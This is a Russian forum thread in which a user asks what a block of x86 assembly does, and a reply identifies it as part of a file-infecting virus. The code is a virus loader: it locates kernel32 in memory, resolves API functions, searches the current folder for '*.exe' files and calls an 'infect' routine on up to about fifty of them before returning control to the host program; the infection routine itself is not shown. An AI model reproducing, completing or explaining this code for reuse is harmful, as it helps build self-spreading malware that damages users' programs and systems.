Разобрать часть кода

@unknown · Регистрация: 23.09.2012

Студворк — интернет-сервис помощи студентам

Помогите плиз просто разобрать часть кода, что он делает:

Кликните здесь для просмотра всего текста

Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
find_str struc
         dwFileAttributes  dd ?
         ftCreationTime    dq ?
         ftLastAccessTime  dq ?
         ftLastWriteTime   dq ? 
         nFileSizeHigh     dd ? 
         nFileSizeLow      dd ?
         dwReserved0       dd ?
         dwReserved1       dd ?   
         cFileName         db 260 dup (?)
         cAlternateFileName db 14 dup (?)
         ends
 
 
include 1.inc
locals __
.386p
.model flat
.data
start:
    db 68h
start_ip_1 dd 1000h
    db 68h
start_ip_2 dd 0  
    pushad
    call $+5
delta:
    pop  ebp
    sub  ebp, offset delta
    call seh
    mov  esp, [esp.8]
    jmp  end_seh
seh:
    sub  eax, eax
    push 4 ptr fs:[eax]
    mov  4 ptr fs:[eax], esp
    mov  ebx, [esp+12*4]
    sub  bx, bx
__0:
    sub  ebx, 10000h
    mov  ax, 2 ptr [ebx]
    not  eax
    cmp  ax, not 'ZM'
    jnz  __0
    ; ebx - K32 base
    lea esi, [ebp+import_table]
__2x: 
    lodsd
    test al, al
    jz  __1x
    mov  dl, [esi]
    inc  esi
    push esi 
    call get_proc
    pop  edi
    stosd
    mov esi, edi
    jmp __2x
__1x:
    sub  edi, edi
    push edi
    call [ebp+GetModuleHandleA]
    mov  4 ptr [esp+(10*4)], eax
    sub  esp, size find_str
    mov  esi, esp
    push esi
    lea  eax, [ebp+mask]
    push eax
    call [ebp+FindFirstFileA]
    cmp  eax, -1
    jz  __1
__2:
    push eax edi esi
    lea  edx, [esi.cFileName]
    mov  edi, [esi.nFileSizeLow]
    call infect
    pop  esi
    push esi
    push 4 ptr [esp.8]
    call [ebp+FindNextFileA]
    pop edi
    inc edi 
    cmp edi, 50
    ja  __3
    test eax, eax
    pop eax
    jnz __2
    push eax
__3:
    call [ebp+FindClose]
__1:  
    add  esp, size find_str 
end_seh:
    pop 4 ptr fs:[0]
    pop eax     
    popad
    pop eax
    add [esp], eax
    ret
 
mask db '*.exe',0
. . .

@ISergey · 07.10.2012, 03:21

Оно тебе нужно? код куска малвари..(файлового вируса)

Новые блоги и статьи Все статьи Все блоги /
делаю науч статью по влиянию грибов на сукцессию anaschu 13.03.2026 прикрепляю статью	SDL3 для Desktop (MinGW): Создаём пустое окно с нуля для 2D-графики на SDL3, Си и C++ 8Observer8 10.03.2026 Содержание блога Финальные проекты на Си и на C++: hello-sdl3-c. zip hello-sdl3-cpp. zip Результат:	Установка CMake и MinGW 13.1 для сборки С и C++ приложений из консоли и из Qt Creator в EXE 8Observer8 10.03.2026 Содержание блога MinGW - это коллекция инструментов для сборки приложений в EXE. CMake - это система сборки приложений. Здесь описаны базовые шаги для старта программирования с помощью CMake и. . .	Как дизайн сайта влияет на конверсию: 7 решений, которые реально повышают заявки Neotwalker 08.03.2026 Многие до сих пор воспринимают дизайн сайта как “красивую оболочку”. На практике всё иначе: дизайн напрямую влияет на то, оставит человек заявку или уйдёт через несколько секунд. Даже если у вас. . .
Модульная разработка через nuget packages DevAlt 07.03.2026 Сложившийся в . Net-среде способ разработки чаще всего предполагает монорепозиторий в котором находятся все исходники. При создании нового решения, мы просто добавляем нужные проекты и имеем. . .	Модульный подход на примере F# DevAlt 06.03.2026 В блоге дяди Боба наткнулся на такое определение: В этой книге («Подход, основанный на вариантах использования») Ивар утверждает, что архитектура программного обеспечения — это структуры,. . .	Управление камерой с помощью скрипта OrbitControls.js на Three.js: Вращение, зум и панорамирование 8Observer8 05.03.2026 Содержание блога Финальная демка в браузере работает на Desktop и мобильных браузерах. Итоговый код: orbit-controls-threejs-js. zip. Сканируйте QR-код на мобильном. Вращайте камеру одним пальцем,. . .	SDL3 для Web (WebAssembly): Синхронизация спрайтов SDL3 и тел Box2D 8Observer8 04.03.2026 Содержание блога Финальная демка в браузере. Итоговый код: finish-sync-physics-sprites-sdl3-c. zip На первой гифке отладочные линии отключены, а на второй включены:. . .

@ISergey Maniac 1465 / 966 / 160 Регистрация: 02.01.2009 Сообщений: 2,820 Записей в блоге: 1
	07.10.2012, 03:21
	Оно тебе нужно? код куска малвари..(файлового вируса) 1